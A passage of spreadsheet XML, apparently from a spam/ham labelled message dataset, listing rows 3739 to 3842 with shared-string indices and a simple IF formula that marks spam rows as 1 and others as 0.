    <row r="3739" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3739" t="s">
        <v>8817</v>
      </c>
      <c r="B3739" t="s">
        <v>5294</v>
      </c>
      <c r="C3739" s="1">
        <f>IF(B3739="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3740" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3740" t="s">
        <v>8818</v>
      </c>
      <c r="B3740" t="s">
        <v>5294</v>
      </c>
      <c r="C3740" s="1">
        <f>IF(B3740="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3741" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3741" t="s">
        <v>8653</v>
      </c>
      <c r="B3741" t="s">
        <v>5294</v>
      </c>
      <c r="C3741" s="1">
        <f>IF(B3741="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3742" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3742" t="s">
        <v>8819</v>
      </c>
      <c r="B3742" t="s">
        <v>5297</v>
      </c>
      <c r="C3742" s="1">
        <f>IF(B3742="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3743" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3743" t="s">
        <v>8820</v>
      </c>
      <c r="B3743" t="s">
        <v>5294</v>
      </c>
      <c r="C3743" s="1">
        <f>IF(B3743="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3744" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3744" t="s">
        <v>8821</v>
      </c>
      <c r="B3744" t="s">
        <v>5294</v>
      </c>
      <c r="C3744" s="1">
        <f>IF(B3744="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3745" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3745" t="s">
        <v>8822</v>
      </c>
      <c r="B3745" t="s">
        <v>5294</v>
      </c>
      <c r="C3745" s="1">
        <f>IF(B3745="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3746" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3746" t="s">
        <v>8823</v>
      </c>
      <c r="B3746" t="s">
        <v>5294</v>
      </c>
      <c r="C3746" s="1">
        <f>IF(B3746="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3747" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3747" t="s">
        <v>8824</v>
      </c>
      <c r="B3747" t="s">
        <v>5294</v>
      </c>
      <c r="C3747" s="1">
        <f>IF(B3747="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3748" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3748" t="s">
        <v>8825</v>
      </c>
      <c r="B3748" t="s">
        <v>5294</v>
      </c>
      <c r="C3748" s="1">
        <f>IF(B3748="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3749" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3749" t="s">
        <v>8826</v>
      </c>
      <c r="B3749" t="s">
        <v>5294</v>
      </c>
      <c r="C3749" s="1">
        <f>IF(B3749="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3750" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3750" t="s">
        <v>8827</v>
      </c>
      <c r="B3750" t="s">
        <v>5297</v>
      </c>
      <c r="C3750" s="1">
        <f>IF(B3750="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3751" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3751" t="s">
        <v>8828</v>
      </c>
      <c r="B3751" t="s">
        <v>5294</v>
      </c>
      <c r="C3751" s="1">
        <f>IF(B3751="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3752" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3752" t="s">
        <v>8829</v>
      </c>
      <c r="B3752" t="s">
        <v>5294</v>
      </c>
      <c r="C3752" s="1">
        <f>IF(B3752="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3753" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3753" t="s">
        <v>8830</v>
      </c>
      <c r="B3753" t="s">
        <v>5294</v>
      </c>
      <c r="C3753" s="1">
        <f>IF(B3753="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3754" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3754" t="s">
        <v>8831</v>
      </c>
      <c r="B3754" t="s">
        <v>5294</v>
      </c>
      <c r="C3754" s="1">
        <f>IF(B3754="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3755" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3755" t="s">
        <v>8565</v>
      </c>
      <c r="B3755" t="s">
        <v>5297</v>
      </c>
      <c r="C3755" s="1">
        <f>IF(B3755="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3756" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3756" t="s">
        <v>8832</v>
      </c>
      <c r="B3756" t="s">
        <v>5294</v>
      </c>
      <c r="C3756" s="1">
        <f>IF(B3756="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3757" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3757" t="s">
        <v>5525</v>
      </c>
      <c r="B3757" t="s">
        <v>5294</v>
      </c>
      <c r="C3757" s="1">
        <f>IF(B3757="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3758" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3758" t="s">
        <v>7575</v>
      </c>
      <c r="B3758" t="s">
        <v>5297</v>
      </c>
      <c r="C3758" s="1">
        <f>IF(B3758="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3759" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3759" t="s">
        <v>8833</v>
      </c>
      <c r="B3759" t="s">
        <v>5294</v>
      </c>
      <c r="C3759" s="1">
        <f>IF(B3759="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3760" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3760" t="s">
        <v>8834</v>
      </c>
      <c r="B3760" t="s">
        <v>5294</v>
      </c>
      <c r="C3760" s="1">
        <f>IF(B3760="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3761" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3761" t="s">
        <v>8835</v>
      </c>
      <c r="B3761" t="s">
        <v>5294</v>
      </c>
      <c r="C3761" s="1">
        <f>IF(B3761="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3762" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3762" t="s">
        <v>8836</v>
      </c>
      <c r="B3762" t="s">
        <v>5294</v>
      </c>
      <c r="C3762" s="1">
        <f>IF(B3762="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3763" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3763" t="s">
        <v>6288</v>
      </c>
      <c r="B3763" t="s">
        <v>5297</v>
      </c>
      <c r="C3763" s="1">
        <f>IF(B3763="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3764" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3764" t="s">
        <v>8837</v>
      </c>
      <c r="B3764" t="s">
        <v>5294</v>
      </c>
      <c r="C3764" s="1">
        <f>IF(B3764="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3765" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3765" t="s">
        <v>8838</v>
      </c>
      <c r="B3765" t="s">
        <v>5294</v>
      </c>
      <c r="C3765" s="1">
        <f>IF(B3765="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3766" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3766" t="s">
        <v>8839</v>
      </c>
      <c r="B3766" t="s">
        <v>5297</v>
      </c>
      <c r="C3766" s="1">
        <f>IF(B3766="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3767" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3767" t="s">
        <v>8840</v>
      </c>
      <c r="B3767" t="s">
        <v>5294</v>
      </c>
      <c r="C3767" s="1">
        <f>IF(B3767="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3768" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3768" t="s">
        <v>8841</v>
      </c>
      <c r="B3768" t="s">
        <v>5294</v>
      </c>
      <c r="C3768" s="1">
        <f>IF(B3768="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3769" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3769" t="s">
        <v>8842</v>
      </c>
      <c r="B3769" t="s">
        <v>5294</v>
      </c>
      <c r="C3769" s="1">
        <f>IF(B3769="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3770" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3770" t="s">
        <v>6935</v>
      </c>
      <c r="B3770" t="s">
        <v>5294</v>
      </c>
      <c r="C3770" s="1">
        <f>IF(B3770="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3771" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3771" t="s">
        <v>8843</v>
      </c>
      <c r="B3771" t="s">
        <v>5294</v>
      </c>
      <c r="C3771" s="1">
        <f>IF(B3771="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3772" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3772" t="s">
        <v>8844</v>
      </c>
      <c r="B3772" t="s">
        <v>5294</v>
      </c>
      <c r="C3772" s="1">
        <f>IF(B3772="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3773" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3773" t="s">
        <v>8845</v>
      </c>
      <c r="B3773" t="s">
        <v>5294</v>
      </c>
      <c r="C3773" s="1">
        <f>IF(B3773="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3774" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3774" t="s">
        <v>8846</v>
      </c>
      <c r="B3774" t="s">
        <v>5294</v>
      </c>
      <c r="C3774" s="1">
        <f>IF(B3774="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3775" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3775" t="s">
        <v>8847</v>
      </c>
      <c r="B3775" t="s">
        <v>5294</v>
      </c>
      <c r="C3775" s="1">
        <f>IF(B3775="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3776" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3776" t="s">
        <v>5473</v>
      </c>
      <c r="B3776" t="s">
        <v>5294</v>
      </c>
      <c r="C3776" s="1">
        <f>IF(B3776="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3777" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3777" t="s">
        <v>8848</v>
      </c>
      <c r="B3777" t="s">
        <v>5294</v>
      </c>
      <c r="C3777" s="1">
        <f>IF(B3777="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3778" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3778" t="s">
        <v>8849</v>
      </c>
      <c r="B3778" t="s">
        <v>5297</v>
      </c>
      <c r="C3778" s="1">
        <f>IF(B3778="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3779" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3779" t="s">
        <v>8850</v>
      </c>
      <c r="B3779" t="s">
        <v>5294</v>
      </c>
      <c r="C3779" s="1">
        <f>IF(B3779="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3780" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3780" t="s">
        <v>8851</v>
      </c>
      <c r="B3780" t="s">
        <v>5297</v>
      </c>
      <c r="C3780" s="1">
        <f>IF(B3780="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3781" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3781" t="s">
        <v>8852</v>
      </c>
      <c r="B3781" t="s">
        <v>5294</v>
      </c>
      <c r="C3781" s="1">
        <f>IF(B3781="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3782" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3782" t="s">
        <v>8853</v>
      </c>
      <c r="B3782" t="s">
        <v>5294</v>
      </c>
      <c r="C3782" s="1">
        <f>IF(B3782="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3783" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3783" t="s">
        <v>8854</v>
      </c>
      <c r="B3783" t="s">
        <v>5294</v>
      </c>
      <c r="C3783" s="1">
        <f>IF(B3783="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3784" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3784" t="s">
        <v>8855</v>
      </c>
      <c r="B3784" t="s">
        <v>5294</v>
      </c>
      <c r="C3784" s="1">
        <f>IF(B3784="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3785" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3785" t="s">
        <v>8856</v>
      </c>
      <c r="B3785" t="s">
        <v>5294</v>
      </c>
      <c r="C3785" s="1">
        <f>IF(B3785="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3786" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3786" t="s">
        <v>8857</v>
      </c>
      <c r="B3786" t="s">
        <v>5294</v>
      </c>
      <c r="C3786" s="1">
        <f>IF(B3786="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3787" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3787" t="s">
        <v>6804</v>
      </c>
      <c r="B3787" t="s">
        <v>5294</v>
      </c>
      <c r="C3787" s="1">
        <f>IF(B3787="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3788" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3788" t="s">
        <v>8858</v>
      </c>
      <c r="B3788" t="s">
        <v>5294</v>
      </c>
      <c r="C3788" s="1">
        <f>IF(B3788="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3789" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3789" t="s">
        <v>8859</v>
      </c>
      <c r="B3789" t="s">
        <v>5297</v>
      </c>
      <c r="C3789" s="1">
        <f>IF(B3789="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3790" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3790" t="s">
        <v>8860</v>
      </c>
      <c r="B3790" t="s">
        <v>5294</v>
      </c>
      <c r="C3790" s="1">
        <f>IF(B3790="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3791" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3791" t="s">
        <v>8861</v>
      </c>
      <c r="B3791" t="s">
        <v>5294</v>
      </c>
      <c r="C3791" s="1">
        <f>IF(B3791="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3792" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3792" t="s">
        <v>8862</v>
      </c>
      <c r="B3792" t="s">
        <v>5297</v>
      </c>
      <c r="C3792" s="1">
        <f>IF(B3792="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3793" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3793" t="s">
        <v>8863</v>
      </c>
      <c r="B3793" t="s">
        <v>5294</v>
      </c>
      <c r="C3793" s="1">
        <f>IF(B3793="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3794" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3794" t="s">
        <v>8864</v>
      </c>
      <c r="B3794" t="s">
        <v>5294</v>
      </c>
      <c r="C3794" s="1">
        <f>IF(B3794="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3795" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3795" t="s">
        <v>8865</v>
      </c>
      <c r="B3795" t="s">
        <v>5294</v>
      </c>
      <c r="C3795" s="1">
        <f>IF(B3795="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3796" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3796" t="s">
        <v>8866</v>
      </c>
      <c r="B3796" t="s">
        <v>5294</v>
      </c>
      <c r="C3796" s="1">
        <f>IF(B3796="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3797" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3797" t="s">
        <v>8867</v>
      </c>
      <c r="B3797" t="s">
        <v>5294</v>
      </c>
      <c r="C3797" s="1">
        <f>IF(B3797="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3798" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3798" t="s">
        <v>8868</v>
      </c>
      <c r="B3798" t="s">
        <v>5294</v>
      </c>
      <c r="C3798" s="1">
        <f>IF(B3798="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3799" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3799" t="s">
        <v>7877</v>
      </c>
      <c r="B3799" t="s">
        <v>5294</v>
      </c>
      <c r="C3799" s="1">
        <f>IF(B3799="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3800" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3800" t="s">
        <v>8869</v>
      </c>
      <c r="B3800" t="s">
        <v>5294</v>
      </c>
      <c r="C3800" s="1">
        <f>IF(B3800="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3801" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3801" t="s">
        <v>8870</v>
      </c>
      <c r="B3801" t="s">
        <v>5297</v>
      </c>
      <c r="C3801" s="1">
        <f>IF(B3801="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3802" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3802" t="s">
        <v>8871</v>
      </c>
      <c r="B3802" t="s">
        <v>5294</v>
      </c>
      <c r="C3802" s="1">
        <f>IF(B3802="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3803" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3803" t="s">
        <v>8872</v>
      </c>
      <c r="B3803" t="s">
        <v>5294</v>
      </c>
      <c r="C3803" s="1">
        <f>IF(B3803="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3804" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3804" t="s">
        <v>8873</v>
      </c>
      <c r="B3804" t="s">
        <v>5294</v>
      </c>
      <c r="C3804" s="1">
        <f>IF(B3804="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3805" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3805" t="s">
        <v>8874</v>
      </c>
      <c r="B3805" t="s">
        <v>5294</v>
      </c>
      <c r="C3805" s="1">
        <f>IF(B3805="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3806" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3806" t="s">
        <v>8875</v>
      </c>
      <c r="B3806" t="s">
        <v>5294</v>
      </c>
      <c r="C3806" s="1">
        <f>IF(B3806="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3807" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3807" t="s">
        <v>8876</v>
      </c>
      <c r="B3807" t="s">
        <v>5297</v>
      </c>
      <c r="C3807" s="1">
        <f>IF(B3807="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3808" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3808" t="s">
        <v>8877</v>
      </c>
      <c r="B3808" t="s">
        <v>5294</v>
      </c>
      <c r="C3808" s="1">
        <f>IF(B3808="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3809" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3809" t="s">
        <v>8878</v>
      </c>
      <c r="B3809" t="s">
        <v>5294</v>
      </c>
      <c r="C3809" s="1">
        <f>IF(B3809="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3810" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3810" t="s">
        <v>8879</v>
      </c>
      <c r="B3810" t="s">
        <v>5294</v>
      </c>
      <c r="C3810" s="1">
        <f>IF(B3810="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3811" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3811" t="s">
        <v>8880</v>
      </c>
      <c r="B3811" t="s">
        <v>5294</v>
      </c>
      <c r="C3811" s="1">
        <f>IF(B3811="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3812" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3812" t="s">
        <v>8881</v>
      </c>
      <c r="B3812" t="s">
        <v>5294</v>
      </c>
      <c r="C3812" s="1">
        <f>IF(B3812="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3813" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3813" t="s">
        <v>8882</v>
      </c>
      <c r="B3813" t="s">
        <v>5294</v>
      </c>
      <c r="C3813" s="1">
        <f>IF(B3813="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3814" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3814" t="s">
        <v>8883</v>
      </c>
      <c r="B3814" t="s">
        <v>5294</v>
      </c>
      <c r="C3814" s="1">
        <f>IF(B3814="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3815" t="s">
        <v>8884</v>
      </c>
      <c r="B3815" t="s">
        <v>5294</v>
      </c>
      <c r="C3815" s="1">
        <f>IF(B3815="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3816" t="s">
        <v>8885</v>
      </c>
      <c r="B3816" t="s">
        <v>5294</v>
      </c>
      <c r="C3816" s="1">
        <f>IF(B3816="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3817" t="s">
        <v>8886</v>
      </c>
      <c r="B3817" t="s">
        <v>5294</v>
      </c>
      <c r="C3817" s="1">
        <f>IF(B3817="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3818" t="s">
        <v>8887</v>
      </c>
      <c r="B3818" t="s">
        <v>5294</v>
      </c>
      <c r="C3818" s="1">
        <f>IF(B3818="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3819" t="s">
        <v>8888</v>
      </c>
      <c r="B3819" t="s">
        <v>5297</v>
      </c>
      <c r="C3819" s="1">
        <f>IF(B3819="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3820" t="s">
        <v>8889</v>
      </c>
      <c r="B3820" t="s">
        <v>5294</v>
      </c>
      <c r="C3820" s="1">
        <f>IF(B3820="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3821" t="s">
        <v>8890</v>
      </c>
      <c r="B3821" t="s">
        <v>5294</v>
      </c>
      <c r="C3821" s="1">
        <f>IF(B3821="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3822" t="s">
        <v>8891</v>
      </c>
      <c r="B3822" t="s">
        <v>5294</v>
      </c>
      <c r="C3822" s="1">
        <f>IF(B3822="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3823" t="s">
        <v>8892</v>
      </c>
      <c r="B3823" t="s">
        <v>5294</v>
      </c>
      <c r="C3823" s="1">
        <f>IF(B3823="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3824" t="s">
        <v>8893</v>
      </c>
      <c r="B3824" t="s">
        <v>5294</v>
      </c>
      <c r="C3824" s="1">
        <f>IF(B3824="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3825" t="s">
        <v>8894</v>
      </c>
      <c r="B3825" t="s">
        <v>5294</v>
      </c>
      <c r="C3825" s="1">
        <f>IF(B3825="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3826" t="s">
        <v>8895</v>
      </c>
      <c r="B3826" t="s">
        <v>5294</v>
      </c>
      <c r="C3826" s="1">
        <f>IF(B3826="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3827" t="s">
        <v>8896</v>
      </c>
      <c r="B3827" t="s">
        <v>5294</v>
      </c>
      <c r="C3827" s="1">
        <f>IF(B3827="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3828" t="s">
        <v>8897</v>
      </c>
      <c r="B3828" t="s">
        <v>5297</v>
      </c>
      <c r="C3828" s="1">
        <f>IF(B3828="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3829" t="s">
        <v>8898</v>
      </c>
      <c r="B3829" t="s">
        <v>5294</v>
      </c>
      <c r="C3829" s="1">
        <f>IF(B3829="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3830" t="s">
        <v>8899</v>
      </c>
      <c r="B3830" t="s">
        <v>5294</v>
      </c>
      <c r="C3830" s="1">
        <f>IF(B3830="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3831" t="s">
        <v>8900</v>
      </c>
      <c r="B3831" t="s">
        <v>5294</v>
      </c>
      <c r="C3831" s="1">
        <f>IF(B3831="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3832" t="s">
        <v>8901</v>
      </c>
      <c r="B3832" t="s">
        <v>5294</v>
      </c>
      <c r="C3832" s="1">
        <f>IF(B3832="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3833" t="s">
        <v>7392</v>
      </c>
      <c r="B3833" t="s">
        <v>5294</v>
      </c>
      <c r="C3833" s="1">
        <f>IF(B3833="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3834" t="s">
        <v>5926</v>
      </c>
      <c r="B3834" t="s">
        <v>5294</v>
      </c>
      <c r="C3834" s="1">
        <f>IF(B3834="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3835" t="s">
        <v>8902</v>
      </c>
      <c r="B3835" t="s">
        <v>5294</v>
      </c>
      <c r="C3835" s="1">
        <f>IF(B3835="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3836" t="s">
        <v>8903</v>
      </c>
      <c r="B3836" t="s">
        <v>5294</v>
      </c>
      <c r="C3836" s="1">
        <f>IF(B3836="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3837" t="s">
        <v>8904</v>
      </c>
      <c r="B3837" t="s">
        <v>5294</v>
      </c>
      <c r="C3837" s="1">
        <f>IF(B3837="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3838" t="s">
        <v>8905</v>
      </c>
      <c r="B3838" t="s">
        <v>5294</v>
      </c>
      <c r="C3838" s="1">
        <f>IF(B3838="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3839" t="s">
        <v>8906</v>
      </c>
      <c r="B3839" t="s">
        <v>5294</v>
      </c>
      <c r="C3839" s="1">
        <f>IF(B3839="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3840" t="s">
        <v>8907</v>
      </c>
      <c r="B3840" t="s">
        <v>5294</v>
      </c>
      <c r="C3840" s="1">
        <f>IF(B3840="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3841" t="s">
        <v>8908</v>
      </c>
      <c r="B3841" t="s">
        <v>5294</v>
      </c>
      <c r="C3841" s="1">
        <f>IF(B3841="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3842" t="s">
        <v>8909</v>
      </c>
      <c r="B3842" t="s">
        <v>5294</v>
      </c>
      <c r="C3842" s="1">
        <f>IF(B3842="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
